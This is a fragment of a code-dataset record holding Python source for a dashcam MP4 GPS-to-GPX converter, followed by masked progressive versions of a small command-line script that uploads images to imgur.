other._longitude\n\n\nclass TrackSegment(object):\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) -> None:\n self._track_points.append(track_point)\n\n def __len__(self) -> int:\n return len(self._track_points)\n\n def __iter__(self) -> Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n_UNKNOWN_BYTES\\\n = b'\\x00\\x21\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\xBC\\xC7\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x3C\\xDB\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x18\\xB5\\x18\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\xA0\\xFE\\x19\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x20\\xF9\\x1B\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\\n\\xAC\\xB3\\x1C\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00'\n\n\ndef parse_mp4_file(mp4_file_path: pathlib.Path) -> List[TrackPoint]:\n track_points = []\n\n with open(mp4_file_path, 'rb') as mp4_file:\n gps_data_block_indices = get_gps_data_block_indices(mp4_file)\n\n for gps_data_block_index in gps_data_block_indices:\n mp4_file.seek(gps_data_block_index.position)\n if mp4_file.tell() != gps_data_block_index.position:\n error_position = gps_data_block_index.position\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' a GPS data block, but got EOF.')\n\n large_block_size = mp4_file.read(4)\n if len(large_block_size) < 4:\n error_position = format(\n mp4_file.tell() - len(large_block_size), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the size of a GPS data block, but got EOF.')\n large_block_size = int.from_bytes(large_block_size, 'big')\n if large_block_size != gps_data_block_index.size:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f'{mp4_file_path}:{error_position}: The\\\n size of a GPS data block is not equal to the one stored in the index.')\n\n large_block_end = mp4_file.tell() - 4 + large_block_size\n\n signature = mp4_file.read(8)\n if len(signature) < 8:\n error_position = format(mp4_file.tell() - len(signature),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the signature of a GPS data block, but got EOF.')\n signature = signature.decode('UTF-8')\n if signature != 'freeGPS ':\n error_position = format(mp4_file.tell() - 8, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n `freeGPS ' as the signature of a GPS data block, but got `{signature}'.\")\n\n small_block_size = mp4_file.read(4)\n if len(small_block_size) < 4:\n error_position = format(\n mp4_file.tell() - len(small_block_size), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the size of a GPS data block, but got EOF.')\n small_block_size = int.from_bytes(small_block_size, 'little')\n if small_block_size != 88:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n `88' as the size of a GPS data block, but got `{small_block_size}'.\")\n\n small_block_end = mp4_file.tell() + small_block_size\n\n padding = mp4_file.read(32)\n if len(padding) < 32:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' zero padding, but got EOF.')\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 32 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n\n hour = mp4_file.read(4)\n if len(hour) < 4:\n error_position = format(mp4_file.tell() - len(hour), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the hour of time, but got EOF.')\n hour = int.from_bytes(hour, 'little')\n if hour < 0 or 24 <= hour:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the hour of time, but got an invalid value `{hour}'.\")\n\n minute = mp4_file.read(4)\n if len(minute) < 4:\n error_position = format(mp4_file.tell() - len(minute), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the minute of time, but got EOF.')\n minute = int.from_bytes(minute, 'little')\n if minute < 0 or 60 <= minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the minute of time, but got an invalid value `{minute}'.\")\n\n second = mp4_file.read(4)\n if len(second) < 4:\n error_position = format(mp4_file.tell() - len(second), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the second of time, but got EOF.')\n second = int.from_bytes(second, 'little')\n if second < 0 or 60 <= second:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the second of time, but got an invalid value `{second}'.\")\n\n year = mp4_file.read(4)\n if len(year) < 4:\n error_position = format(mp4_file.tell() - len(year), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the year of time, but got EOF.')\n year = int.from_bytes(year, 'little')\n if year == 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n if hour != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year == 0' but `hour != 0'.\")\n if minute != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year == 0' but `minute != 0'.\")\n if second != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year == 0' but `second != 0'.\")\n else:\n year += 2000\n\n month = mp4_file.read(4)\n if len(month) < 4:\n error_position = format(mp4_file.tell() - len(month), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the month of time, but got EOF.')\n month = int.from_bytes(month, 'little')\n if month == 0:\n if year != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year != 0' but `month == 0'.\")\n assert(hour == 0)\n assert(minute == 0)\n assert(second == 0)\n elif month < 1 or 12 < month:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the month of time, but got an invalid value `{month}'.\")\n\n day = mp4_file.read(4)\n if len(day) < 4:\n error_position = format(mp4_file.tell() - len(day), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the day of time, but got EOF.')\n day = int.from_bytes(day, 'little')\n if day == 0:\n if year != 0:\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\"\n \" `year != 0' but `day == 0'.\")\n assert(month == 0)\n assert(hour == 0)\n assert(minute == 0)\n assert(second == 0)\n elif day < 1 or 31 < day:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n the day of time, but got an invalid value `{day}'.\")\n\n if year == 0:\n assert(month == 0)\n assert(day == 0)\n assert(hour == 0)\n assert(minute == 0)\n assert(second == 0)\n time = None\n else:\n time = datetime.datetime.now(datetime.timezone.utc)\n time = time.astimezone()\n time = time.replace(\n year=year, month=month, day=day, hour=hour, minute=minute,\n second=second, microsecond=0)\n time = Time(time)\n\n if time is None:\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero-padding, but got EOF.')\n padding = int.from_bytes(padding, 'little')\n if padding != 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect\"\n f\" zero-padding, but got `{padding}'.\")\n status = None\n latitude_type = '0'\n longitude_type = '0'\n else:\n status = mp4_file.read(1)\n if len(status) < 1:\n error_position = format(mp4_file.tell() - len(status),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a status'\n ' character, but got EOF.')\n status = status.decode('UTF-8')\n if status not in ('A', 'V'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect `A' or `V' as a status character, but got an invalid character\\\n `{status}'.\")\n\n latitude_type = mp4_file.read(1)\n if len(latitude_type) < 1:\n error_position = format(\n mp4_file.tell() - len(latitude_type), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:\\\n Expect a latitude type, but got EOF.')\n latitude_type = latitude_type.decode('UTF-8')\n if status == 'A':\n if latitude_type not in ('N', 'S'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `N' or\\\n `S' as a latitude type, but got an invalid character `{latitude_type}'.\")\n else:\n assert(status == 'V')\n if latitude_type != '0':\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect `0' as a latitude type, but got an invalid character\\\n `{latitude_type}'.\")\n\n longitude_type = mp4_file.read(1)\n if len(longitude_type) < 1:\n error_position = format(\n mp4_file.tell() - len(longitude_type), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:\\\n Expect a longitude type, but got EOF.')\n longitude_type = longitude_type.decode('UTF-8')\n if status == 'A':\n if longitude_type not in ('E', 'W'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `E' or\\\n `W' as a longitude type, but got an invalid character `{longitude_type}'.\")\n else:\n assert(status == 'V')\n if longitude_type != '0':\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect `0' as a longitude type, but got an invalid character\\\n `{longitude_type}'.\")\n\n padding = mp4_file.read(1)\n if len(padding) < 1:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero padding, but got EOF.')\n if padding[0] != 0:\n error_position = format(mp4_file.tell() - 1, '#010x')\n byte = format(padding[0], '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n\n if status == 'A':\n latitude_dmm = read_little_endian_single(mp4_file)\n latitude_degree = math.floor(latitude_dmm / 100)\n if latitude_degree < 0 or 90 < latitude_degree:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\")\n latitude_minute = latitude_dmm - latitude_degree * 100\n if latitude_minute < 0 or 60 <= latitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\")\n latitude_degree += latitude_minute / 60\n latitude = Latitude(latitude_degree)\n else:\n assert(status == 'V' or status is None)\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(\n mp4_file.tell() - len(padding), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero padding, but got EOF.')\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(\n mp4_file.tell() - 4 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n latitude = None\n\n if status == 'A':\n longitude_dmm = read_little_endian_single(mp4_file)\n longitude_degree = math.floor(longitude_dmm / 100)\n if longitude_degree < 0 or 180 < longitude_degree:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a longitude in DMM format, but got an invalid value\\\n `{longitude_dmm}'.\")\n longitude_minute = longitude_dmm - longitude_degree * 100\n if longitude_minute < 0 or 60 <= longitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect a longitude in DMM format, but got an invalid value\\\n `{longitude_dmm}'.\")\n longitude_degree += longitude_minute / 60\n longitude = Longitude(longitude_degree)\n else:\n assert(status == 'V' or status is None)\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(\n mp4_file.tell() - len(padding), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}:'\n ' Expect zero padding, but got EOF.')\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(\n mp4_file.tell() - 4 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n longitude = None\n\n speed = read_little_endian_single(mp4_file)\n # Presume that speed is recorded in knots.\n speed *= (1852 / 3600)\n speed = Speed(speed)\n\n azimuth = read_little_endian_single(mp4_file)\n if azimuth < 0 or 360 <= azimuth:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n azimuth degree, but got an invalid value `{azimuth}'.\")\n azimuth = Azimuth(azimuth)\n\n x_acceleration = mp4_file.read(4)\n if len(x_acceleration) < 4:\n error_position = format(\n mp4_file.tell() - len(x_acceleration), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' X-axis acceleration, but got EOF.')\n x_acceleration = int.from_bytes(\n x_acceleration, 'little', signed=True)\n\n y_acceleration = mp4_file.read(4)\n if len(y_acceleration) < 4:\n error_position = format(\n mp4_file.tell() - len(y_acceleration), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' Y-axis acceleration, but got EOF.')\n y_acceleration = int.from_bytes(\n y_acceleration, 'little', signed=True)\n\n z_acceleration = mp4_file.read(4)\n if len(z_acceleration) < 4:\n error_position = format(\n mp4_file.tell() - len(z_acceleration), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' Z-axis acceleration, but got EOF.')\n z_acceleration = int.from_bytes(\n z_acceleration, 'little', signed=True)\n\n if mp4_file.tell() != small_block_end:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the end of a GPS data block, but got additional data.')\n\n padding_size = large_block_end - small_block_end\n if padding_size < 532:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n more than or equal to 532-byte padding, but got only {padding_size}-byte\\\n padding.')\n padding = mp4_file.read(padding_size)\n if len(padding) < padding_size:\n error_position = format(\n mp4_file.tell() - len(padding), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n {padding_size}-byte padding, but got EOF.')\n for j, b in enumerate(padding[:420]):\n if b != 0:\n error_position = format(small_block_end + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n # `_UNKNOWN_BYTES` may appear in the zero padding. However,\n # what this means is unknown. Therefore, just skip it if it\n # appears.\n if padding[420:532] != _UNKNOWN_BYTES:\n for j, b in enumerate(padding[420:532]):\n if b != 0:\n error_position = format(small_block_end + 420 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n for j, b in enumerate(padding[532:]):\n if b != 0:\n error_position = format(small_block_end + 532 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n\n track_point = TrackPoint(\n time, status, latitude, longitude, speed, azimuth,\n x_acceleration, y_acceleration, z_acceleration)\n track_points.append(track_point)\n\n return track_points\n\n\ndef read_input_paths(input_paths: List[pathlib.Path]) -> List[TrackPoint]:\n track_points = []\n\n for input_path in input_paths:\n if input_path.is_dir():\n file_paths = []\n for dirpath, dirnames, filenames in os.walk(input_path):\n dirpath = pathlib.Path(dirpath)\n for filename in filenames:\n file_path = dirpath / filename\n if file_path.suffix not in ('.mp4', '.MP4'):\n continue\n file_paths.append(file_path)\n\n file_paths.sort()\n\n for file_path in file_paths:\n track_points.extend(parse_mp4_file(file_path))\n else:\n track_points.extend(parse_mp4_file(input_path))\n\n return track_points\n\n\ndef write_csv_file(args: Arguments,\n track_points: List[TrackPoint]) -> pathlib.Path:\n if args.name is None:\n print(\"`--name' is required to output a CSV file.\", file=sys.stderr)\n sys.exit(1)\n\n csv_file_path = pathlib.Path(f'{args.name}.csv')\n if csv_file_path.exists():\n if not args.overwrite:\n print(f\"{csv_file_path}: File already exists.\", file=sys.stderr)\n sys.exit(1)\n\n with open(csv_file_path, 'w') as csv_file:\n for track_point in track_points:\n print(track_point.format_as_csv(), file=csv_file)\n\n return csv_file_path\n\n\ndef create_track_segments(\n args: Arguments, track_points: List[TrackPoint]) -> List[TrackSegment]:\n new_track_points = []\n for track_point in track_points:\n if track_point.status != 'A':\n assert(track_point.latitude is None)\n assert(track_point.longitude is None)\n continue\n assert(track_point.latitude is not None)\n assert(track_point.longitude is not None)\n new_track_points.append(track_point)\n track_points = new_track_points\n\n track_points.sort()\n\n if len(track_points) == 0:\n return []\n\n unique_track_points = []\n it = iter(track_points)\n representative_track_point = next(it)\n while True:\n track_point = next(it, None)\n\n if track_point is None:\n unique_track_points.append(representative_track_point)\n break\n\n if track_point.time != representative_track_point.time:\n unique_track_points.append(representative_track_point)\n representative_track_point = track_point\n continue\n\n if track_point.latitude == representative_track_point.latitude\\\n and track_point.longitude == representative_track_point.longitude:\n continue\n\n if args.how_to_unique == 'first':\n continue\n elif args.how_to_unique == 'last':\n representative_track_point = track_point\n else:\n raise RuntimeError(\"There exist track points with the same\\\n timestamp but different coordinates. Use `--uniq' option.\")\n\n track_segments = []\n track_segments.append(TrackSegment())\n for track_point in unique_track_points:\n track_segments[0].append_track_point(track_point)\n\n return track_segments\n\n\ndef as_xml_attribute(data: str) -> str:\n return xml.sax.saxutils.quoteattr(data)\n\n\ndef as_xml_data(data: str) -> str:\n return xml.sax.saxutils.escape(data)\n\n\ndef get_local_time_in_iso8601() -> str:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n local_time_in_iso8601 = local_aware_now.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('([+-]\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', local_time_in_iso8601)\n\n\ndef write_gpx_file(args: Arguments,\n track_segments: List[TrackSegment]) -> pathlib.Path:\n all_track_points = []\n for track_segment in track_segments:\n for track_point in track_segment:\n all_track_points.append(track_point)\n\n name = args.name\n if name is None:\n if len(all_track_points) == 0:\n raise ValueError(\n \"`--name' is not specified, and there is no track point.\")\n all_track_points.sort()\n name = all_track_points[0].name\n\n gpx_file_path = pathlib.Path(f'{name}.gpx')\n\n bounds = None\n if len(all_track_points) > 0:\n latitudes = list(t.latitude for t in all_track_points)\n latitudes.sort()\n longitudes = list(t.longitude for t in all_track_points)\n longitudes.sort()\n bounds = (latitudes[0], longitudes[0], latitudes[-1], longitudes[-1])\n\n if gpx_file_path.exists():\n if not args.overwrite:\n print(f'{gpx_file_path}: Error: File already exists.',\n file=sys.stderr)\n sys.exit(1)\n\n with open(gpx_file_path, 'w') as gpx_file:\n print('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?>',\n file=gpx_file)\n print('<gpx xmlns=\"http://www.topografix.com/GPX/1/1\" version=\"1.1\"'\n ' creator=\"papago2gpx\">', file=gpx_file)\n print(' <metadata>', file=gpx_file)\n print(f' <name>{as_xml_data(name)}</name>', file=gpx_file)\n if args.description is not None:\n description = as_xml_data(args.description)\n print(f' <desc>{description}</desc>', file=gpx_file)\n if args.author_name is not None or args.author_email is not None:\n print(' <author>', file=gpx_file)\n if args.author_name is not None:\n author_name = as_xml_data(args.author_name)\n print(f' <name>{author_name}</name>', file=gpx_file)\n if args.author_email is not None:\n author_email_parts = args.author_email.split('@', 1)\n if len(author_email_parts) != 2:\n raise RuntimeError(\n f'An invalid E-mail address: {args.author_email}')\n author_email_id = as_xml_attribute(author_email_parts[0])\n author_email_domain = as_xml_attribute(author_email_parts[1])\n print(f' <email id={author_email_id}\\\n domain={author_email_domain}/>', file=gpx_file)\n print(' </author>', file=gpx_file)\n if args.copyright is not None:\n copyright = as_xml_attribute(args.copyright)\n print(f' <copyright author={copyright}', end='', file=gpx_file)\n copyright_year = args.copyright_year\n copyright_license = args.copyright_license\n if copyright_year is not None or copyright_license is not None:\n print('>', file=gpx_file)\n if copyright_year is not None:\n copyright_year = as_xml_data(str(copyright_year))\n print(f' <year>{copyright_year}</year>',\n file=gpx_file)\n if copyright_license is not None:\n copyright_license = as_xml_data(copyright_license)\n print(f' <license>{copyright_license}</license>',\n file=gpx_file)\n print(' </copyright>', file=gpx_file)\n else:\n print('/>', file=gpx_file)\n print(f' <time>{get_local_time_in_iso8601()}</time>', file=gpx_file)\n if args.keywords is not None:\n keywords = as_xml_data(args.keywords)\n print(f' <keywords>{keywords}</keywords>', file=gpx_file)\n if bounds is not None:\n print(f' <bounds minlat=\"{bounds[0]}\" minlon=\"{bounds[1]}\"\\\n maxlat=\"{bounds[2]}\" maxlon=\"{bounds[3]}\"/>', file=gpx_file)\n print(' </metadata>', file=gpx_file)\n print(' <trk>', file=gpx_file)\n if args.track_name is not None:\n track_name = as_xml_data(args.track_name)\n print(f' <name>{track_name}</name>', file=gpx_file)\n if args.track_comment is not None:\n track_comment = as_xml_data(args.track_comment)\n print(f' <cmt>{track_comment}</cmt>', file=gpx_file)\n if args.track_description is not None:\n track_description = as_xml_data(args.track_description)\n print(f' <desc>{track_description}</desc>', file=gpx_file)\n if args.track_type is not None:\n track_type = as_xml_data(args.track_type)\n print(f' <type>{track_type}</type>', file=gpx_file)\n for track_segment in track_segments:\n print(' <trkseg>', file=gpx_file)\n for track_point in track_segment:\n print(f' <trkpt lat=\"{track_point.latitude}\"\\\n lon=\"{track_point.longitude}\">', file=gpx_file)\n print(f' <time>{track_point.time}</time>',\n file=gpx_file)\n print(' </trkpt>', file=gpx_file)\n print(' </trkseg>', file=gpx_file)\n print(' </trk>', file=gpx_file)\n print('</gpx>', file=gpx_file)\n\n proc = subprocess.run(\n ['xmllint', '--schema', 'gpx.xsd', str(gpx_file_path)],\n stdin=subprocess.DEVNULL, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, encoding='UTF-8')\n if proc.returncode != 0:\n print(f\"\"\"Failed to validate the GPX file `{gpx_file_path}'.\ncommand: {proc.args}\nstdout: {proc.stdout}\nstderr: {proc.stderr}\nreturncode: {proc.returncode}\"\"\", file=sys.stderr)\n\n return gpx_file_path\n\n\nif __name__ == '__main__':\n args = Arguments()\n\n track_points = read_input_paths(args.input_paths)\n\n csv_file_path = write_csv_file(args, track_points)\n print(f\"Succeeded! The result is output to `{csv_file_path}'.\")\n\n track_segments = create_track_segments(args, track_points)\n\n if args.name is None and len(track_segments) == 0:\n print(\"`--name' is not specified, and there is no track segment.\",\n file=sys.stderr)\n sys.exit(1)\n\n if len(track_segments) == 0:\n print('WARNING: There is no track segment.', file=sys.stderr)\n\n gpx_file_path = write_gpx_file(args, track_segments)\n\n print(f\"Succeeded! The result is output to `{gpx_file_path}'.\")\n sys.exit(0)\n",
"step-ids": [
47,
55,
64,
81,
82
]
}
|
[
47,
55,
64,
81,
82
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(args):
if not args.quiet:
print('Uploading.....')
resp = postimg.Imgur(args.img_path).upload()
if not resp['success']:
if not args.quiet:
print(json.dumps(resp, sort_keys=True, indent=4, separators=(
',', ': ')))
print('Unable to upload !!!')
return None
link = resp['data']['link']
if args.github:
link = '' % link
elif args.reddit:
link = '[Reddit](%s)' % link
elif args.html:
link = '<img src="%s" alt="snap">' % link
pyperclip.copy(link)
print(link)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(args):
if not args.quiet:
print('Uploading.....')
resp = postimg.Imgur(args.img_path).upload()
if not resp['success']:
if not args.quiet:
print(json.dumps(resp, sort_keys=True, indent=4, separators=(
',', ': ')))
print('Unable to upload !!!')
return None
link = resp['data']['link']
if args.github:
link = '' % link
elif args.reddit:
link = '[Reddit](%s)' % link
elif args.html:
link = '<img src="%s" alt="snap">' % link
pyperclip.copy(link)
print(link)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Post/upload image on imgur.com', epilog=
'link will automatically copied to clipboard')
parser.add_argument('img_path', type=str, help='image path of file')
parser.add_argument('--github', action='store_true', help=
'Github markdown code of imgur url')
parser.add_argument('--html', action='store_true', help=
'html <img> code of imgur url')
parser.add_argument('--reddit', action='store_true', help=
'reddit markdown code of imgur url')
parser.add_argument('-q', '--quiet', action='store_true', help=
'print only img url without verbose output')
args = parser.parse_args()
try:
main(args)
except KeyboardInterrupt:
print('Error: Interrupted by user!!')
<|reserved_special_token_1|>
from postimg import postimg
import argparse
import pyperclip
import json
def main(args):
if not args.quiet:
print('Uploading.....')
resp = postimg.Imgur(args.img_path).upload()
if not resp['success']:
if not args.quiet:
print(json.dumps(resp, sort_keys=True, indent=4, separators=(
',', ': ')))
print('Unable to upload !!!')
return None
link = resp['data']['link']
if args.github:
link = '' % link
elif args.reddit:
link = '[Reddit](%s)' % link
elif args.html:
link = '<img src="%s" alt="snap">' % link
pyperclip.copy(link)
print(link)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Post/upload image on imgur.com', epilog=
'link will automatically copied to clipboard')
parser.add_argument('img_path', type=str, help='image path of file')
parser.add_argument('--github', action='store_true', help=
'Github markdown code of imgur url')
parser.add_argument('--html', action='store_true', help=
'html <img> code of imgur url')
parser.add_argument('--reddit', action='store_true', help=
'reddit markdown code of imgur url')
parser.add_argument('-q', '--quiet', action='store_true', help=
'print only img url without verbose output')
args = parser.parse_args()
try:
main(args)
except KeyboardInterrupt:
print('Error: Interrupted by user!!')
<|reserved_special_token_1|>
#!/usr/bin/env python
from postimg import postimg
import argparse
import pyperclip
import json
def main(args):
if not args.quiet:
print("Uploading.....")
resp = postimg.Imgur(args.img_path).upload()
if not resp['success']:
if not args.quiet:
print(json.dumps(resp, sort_keys=True, indent=4, separators=(',', ': ')))
print("Unable to upload !!!")
return None
link = resp['data']['link']
if args.github:
link = ''%link
elif args.reddit:
link = '[Reddit](%s)'%link
elif args.html:
link = '<img src="%s" alt="snap">'%link
pyperclip.copy(link)
print(link)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Post/upload image on imgur.com', epilog='link will automatically copied to clipboard')
parser.add_argument('img_path', type=str, help='image path of file')
parser.add_argument('--github', action='store_true', help='Github markdown code of imgur url')
parser.add_argument('--html', action='store_true', help='html <img> code of imgur url')
parser.add_argument('--reddit', action='store_true', help='reddit markdown code of imgur url')
parser.add_argument('-q','--quiet', action='store_true', help='print only img url without verbose output')
args = parser.parse_args()
try:
main(args)
except KeyboardInterrupt:
print("Error: Interrupted by user!!")
|
flexible
|
{
"blob_id": "705755340eef72470fc982ebd0004456469d23e4",
"index": 4859,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(args):\n if not args.quiet:\n print('Uploading.....')\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(\n ',', ': ')))\n print('Unable to upload !!!')\n return None\n link = resp['data']['link']\n if args.github:\n link = '' % link\n elif args.reddit:\n link = '[Reddit](%s)' % link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">' % link\n pyperclip.copy(link)\n print(link)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main(args):\n if not args.quiet:\n print('Uploading.....')\n resp = postimg.Imgur(args.img_path).upload()\n if not resp['success']:\n if not args.quiet:\n print(json.dumps(resp, sort_keys=True, indent=4, separators=(\n ',', ': ')))\n print('Unable to upload !!!')\n return None\n link = resp['data']['link']\n if args.github:\n link = '' % link\n elif args.reddit:\n link = '[Reddit](%s)' % link\n elif args.html:\n link = '<img src=\"%s\" alt=\"snap\">' % link\n pyperclip.copy(link)\n print(link)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Post/upload image on imgur.com', epilog=\n 'link will automatically copied to clipboard')\n parser.add_argument('img_path', type=str, help='image path of file')\n parser.add_argument('--github', action='store_true', help=\n 'Github markdown code of imgur url')\n parser.add_argument('--html', action='store_true', help=\n 'html <img> code of imgur url')\n parser.add_argument('--reddit', action='store_true', help=\n 'reddit markdown code of imgur url')\n parser.add_argument('-q', '--quiet', action='store_true', help=\n 'print only img url without verbose output')\n args = parser.parse_args()\n try:\n main(args)\n except KeyboardInterrupt:\n print('Error: Interrupted by user!!')\n",
